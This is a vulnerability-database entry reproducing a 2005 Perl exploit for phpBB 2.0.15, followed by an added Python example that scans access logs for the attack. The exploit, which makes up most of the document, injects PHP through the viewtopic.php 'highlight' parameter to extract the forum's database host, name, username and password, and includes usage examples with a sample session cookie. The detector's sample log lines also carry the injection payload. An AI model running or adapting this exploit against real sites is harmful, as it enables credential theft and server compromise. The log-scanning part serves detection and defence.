phpBB 2.0.15 – ‘highlight’ Database Authentication Details


Vulnerability ID: 1055216    Vulnerability type:
Published: 2005-07-03    Updated: 2005-07-03
CVE ID: N/A
CNNVD-ID: N/A
Platform: PHP    CVSS score: N/A
|Vulnerability source
https://www.exploit-db.com/exploits/1080
|Vulnerability details
Vulnerability details have not yet been disclosed
|Exploit (EXP)
#!/usr/bin/perl

# tested and working /str0ke

#        ********************************************************************
#       **********************************************************************
#      ****                                                                 **
#     ***      ******       *******************                             **
#    ***    ***   ****   ***********************                            **
#   ***   ***     ****                       ****      *   ***    *****     **
#  ***   ***      ***                ***     ***      *  **  **   **        **
# ***   ***                         ***      **         **   **  **         **
#***   ***                          ***    ***          **   **  *****      **
#**   ***                          ***  ****           **   **      **      **
#**   ***       ***  ***   ******* *******             **  ***      **      **
#**   ***      ***   ***  **      *** ***              **  **  **  **       **
#**  ***      ***   ***  **      ***  ***               ***   *****         **
#**   ***     ***   *** **       ***  ***                                   **
#**   ****   ***    ****        ***   ***                                   **
#**     *******    ****   ********     ***********************************  **
#**         ***                                                             **
#**        ***                                                              **
#**                                                                         **
#**      phpBB 2.0.15 Viewtopic.PHP Remote Code Execution Vulnerability     **
#**      This exploit gives the user all the details about the database     **
#**      connection such as database host, username, password and           **
#**      database name.                                                     **
#**                                                                         **
#**              Written by SecureD,  gvr.secured<AT>gmail<DOT>com,2005     **
#**                                                                         **
#**      Greetings to GvR, Jumento, PP, CKrew & friends      		        **
#**                                                                         **
#***************************************************************************** 
# ***************************************************************************

use IO::Socket;

print "+-----------------------------------------------------------------------+\r\n";
print "|           PhpBB 2.0.15 Database Authentication Details Exploit        |\r\n";
print "|                 By SecureD gvr.secured<AT>gmail<DOT>com               |\r\n";
print "+-----------------------------------------------------------------------+\r\n";

if (@ARGV < 3)
{
print "Usage:\r\n";
print "phpbbSecureD.pl SERVER DIR THREADID COOKIESTRING\r\n\r\n";
print "SERVER         - Server where PhpBB is installed.\r\n";
print "DIR            - PHPBB directory or / for no directory.\r\n";
print "THREADID       - Id of an existing thread.\r\n";
print "COOKIESTRING   - Optional, cookie string of the http request.\r\n";
print "                 Use this when a thread needs authentication for viewing\r\n";
print "                 You can use Firefox in combination with \"Live HTTP\r\n";
print "                 Headers\" to get this cookiestring.\r\n\r\n";
print "Example 1 (with cookiestring):\r\n";
print "phpbbSecured.pl 192.168.168.123 /PHPBB/ 8 \"phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D; phpbb2mysql_sid=10dae92b780914332896df43808c4e09\" \r\n\r\n";
print "Example 2 (without cookiestring):\r\n";
print "phpbbSecured.pl 192.168.168.123 /PHPBB/ 20 \r\n";
exit();
}

$serv 		= $ARGV[0];
$dir 		= $ARGV[1];
$threadid 	= $ARGV[2];
$cookie 	= $ARGV[3];

$serv 		=~ s/http:\/\///ge;
$delimit 	= "GvRSecureD";

$sploit	 = $dir . "viewtopic.php?t=";
$sploit .= $threadid;
$sploit .= "&highlight='.printf($delimit.";
$sploit .= "\$dbhost.";
$sploit .= "$delimit.";
$sploit .= "\$dbname.";
$sploit .= "$delimit.";
$sploit .= "\$dbuser.";
$sploit .= "$delimit.";
$sploit .= "\$dbpasswd.";
$sploit .= "$delimit).'";

$sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$serv", PeerPort=>"80") or die "[+] Connecting ... Could not connect to host.\n\n";

print "[+] Connecting      OK\n";
sleep(1);

print "[+] Sending exploit ";
print $sock "GET $sploit HTTP/1.1\r\n";
print $sock "Host: $serv\r\n";
if ( defined $cookie) {
	print $sock "Cookie: $cookie \r\n";
}
print $sock "Connection: close\r\n\r\n";


$succes = 0;

while ($answer = <$sock>) {
	$delimitIndex = index $answer, $delimit;
	if ($delimitIndex >= 0) {
		$succes = 1;
		$urlIndex = index $answer, "href";
		if ($urlIndex < 0){
			$answer = substr($answer, length($delimit));
			$length = 0;
			while (length($answer) > 0) {
				$nex = index($answer, $delimit);
				if ($nex > 0) {
					push(@array, substr($answer, 0, $nex));
					$answer = substr($answer, $nex + length($delimit), length($answer));
				} else {
					$answer= "";
				}
			}
		}
	}
}

close($sock);

if ($succes == 1) {
	print "OK\n";
	sleep(1);
	print "[+] Database Host:  " . $array[0] . "\n";
	sleep(1);
	print "[+] Database Name:  " . $array[1] . "\n";
	sleep(1);
	print "[+] Username:       " . $array[2] . "\n";
	sleep(1);
	print "[+] Password:       " . $array[3] . "\n";
	sleep(1);
} else {
	print "FAILED\n";
}

# milw0rm.com [2005-07-03]
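
Added example (not part of the original entry or the exploit author's code): a defender-side access-log check for the request shape the script above sends, a viewtopic.php request whose highlight parameter opens with a single quote followed by PHP code. The log lines, the MARK delimiter and all function names are constructed for this example.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Constructed access-log lines (combined log format); hosts, paths and the
# MARK delimiter are made up for this example.
SAMPLE_LOG = """\
198.51.100.7 - - [03/Jul/2005:10:00:01 +0000] "GET /phpBB/viewtopic.php?t=8&highlight=install+guide HTTP/1.1" 200 18234
203.0.113.9 - - [03/Jul/2005:10:02:14 +0000] "GET /phpBB/viewtopic.php?t=8&highlight='.printf(MARK.$dbhost.MARK).' HTTP/1.1" 200 18301
203.0.113.9 - - [03/Jul/2005:10:02:19 +0000] "GET /phpBB/viewtopic.php?t=8&highlight=%27.printf%28MARK.%24dbuser.MARK%29.%27 HTTP/1.1" 200 18299
198.51.100.7 - - [03/Jul/2005:10:05:40 +0000] "GET /phpBB/viewtopic.php?t=12&highlight=don%27t HTTP/1.1" 200 17650
198.51.100.7 - - [03/Jul/2005:10:06:02 +0000] "GET /phpBB/index.php HTTP/1.1" 200 9120
""".splitlines()

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Signs of code rather than a search term: quote followed by string
# concatenation, a PHP variable, or a function call.
CODE_RE = re.compile(r"'\s*\.|\$\w+|\w+\s*\(")

def fully_unquote(value, max_rounds=3):
    """Decode repeatedly so nested percent-encoding is normalised before matching."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_highlight(line):
    """Return the decoded highlight value if it looks like PHP code, else None."""
    match = REQUEST_RE.search(line)
    if not match:
        return None
    url = urlsplit(match.group(1))
    if not url.path.lower().endswith("viewtopic.php"):
        return None
    for key, value in parse_qsl(url.query, keep_blank_values=True):
        decoded = fully_unquote(value)  # parse_qsl has already decoded once
        if key == "highlight" and "'" in decoded and CODE_RE.search(decoded):
            return decoded
    return None

def scan(lines):
    """Return (line number, client address, decoded value) for each flagged request."""
    hits = []
    for number, line in enumerate(lines, start=1):
        value = suspicious_highlight(line)
        if value is not None:
            hits.append((number, line.split()[0], value))
    return hits
```

The apostrophe in the ordinary search term on line 4 of the sample is not flagged, because a quote alone is not treated as evidence of code.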
